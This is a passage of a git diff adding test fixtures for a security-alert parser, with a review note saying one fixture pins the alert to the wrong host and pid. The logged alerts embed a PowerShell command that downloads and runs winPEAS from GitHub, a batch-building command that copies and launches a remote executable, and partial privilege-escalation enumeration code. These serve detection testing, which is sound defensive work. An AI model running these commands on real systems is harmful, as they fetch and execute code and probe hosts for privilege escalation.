[\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": 
[\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Process Injection from Windows Temporary Location to System32", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-23T07:49:48Z", + "host": { + "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "ip": [ + "19.112.87.74" + ], + "name": "CHTX-XMEDICA-2K12.windows10.local" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "SesProbe-31944.exe ", + "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "hash": { + "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "sha256": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303" + }, + "parent": { + "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S", + "executable": "C:\\Windows\\System32\\cmd.exe", + "hash": { + "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + } + }, + "pid": 5552 + }, + "related": { + "hash": [ + "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + 
"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303",
+ "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502"
+ ],
+ "ip": [
+ "19.112.87.74"
+ ],
+ "user": [
+ "jdoe"
+ ]
+ },
+ "rule": {
+ "name": "Process Injection from Windows Temporary Location to System32"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-11111-22222222-00000",
+ "incident_id": "IC-14558-20240722-00000",
+ "investigation_status": "New",
+ "severity": "medium",
+ "status": "Open"
+ }
+ },
+ "user": {
+ "domain": "windows10",
+ "id": "windows10\\jdoe",
+ "name": "jdoe"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 83d7e99b5..61b294270 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
@@ -20,6 +20,7 @@
 "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0"
 },
 "host": {
+ "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E",
 "ip": [
 "10.10.58.51"
 ],
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
new file mode 100644
index 000000000..e3283fe41
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
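Review bot: The expected output pins this alert to the wrong host: `host.id`/`host.name`/`related.ip` are `7E8FDBEF-…` / `CHTX-XMEDICA-2K12.windows10.local` / `19.112.87.74`, which is simply the first host entity in `impactScope.entities` and carries only `"provenance": ["Sweeping"]` with indicators 1, 5 and 7, whereas the host on which the injection actually fired is `E991724A-…` (`PRESTATAIR-2K19`, `1.231.184.40`), the only entity with `"Alert"` provenance, all 22 related indicators and the `windows10\\jdoe` account linked to it. The parser is not in this diff, so this is inferred from the fixture, but as written the test locks in first-entity selection and an analyst pivoting on `host.ip` from this event would land on an unaffected sweep target; I would pick the host entity whose `provenance` contains `Alert` (falling back to the first host) and change the expected `host` block and `related.ip` to `E991724A-42D2-44F9-B122-40290A2E9E15` / `PRESTATAIR-2K19` / `1.231.184.40`. A second inconsistency in the same expected block: `process.pid: 5552` is taken from indicator 19 (`objectPid`, the injected-into `gpresult.exe`), while `process.executable` and `process.command_line` describe the injecting `SesProbe-31944.exe` (`processFilePath`/`processCmd`), so the pid and the executable on the event belong to two different processes; either drop `process.pid` when only `objectPid` is present or document in the fixture that it is the target pid.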
@@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", 
\"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | 
Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n 
if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": 
\"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", 
\"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", 
\"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 
'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n 
}\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], 
\"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Possible Web Service Abuse", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:45:28Z", + "action": { + "properties": { + 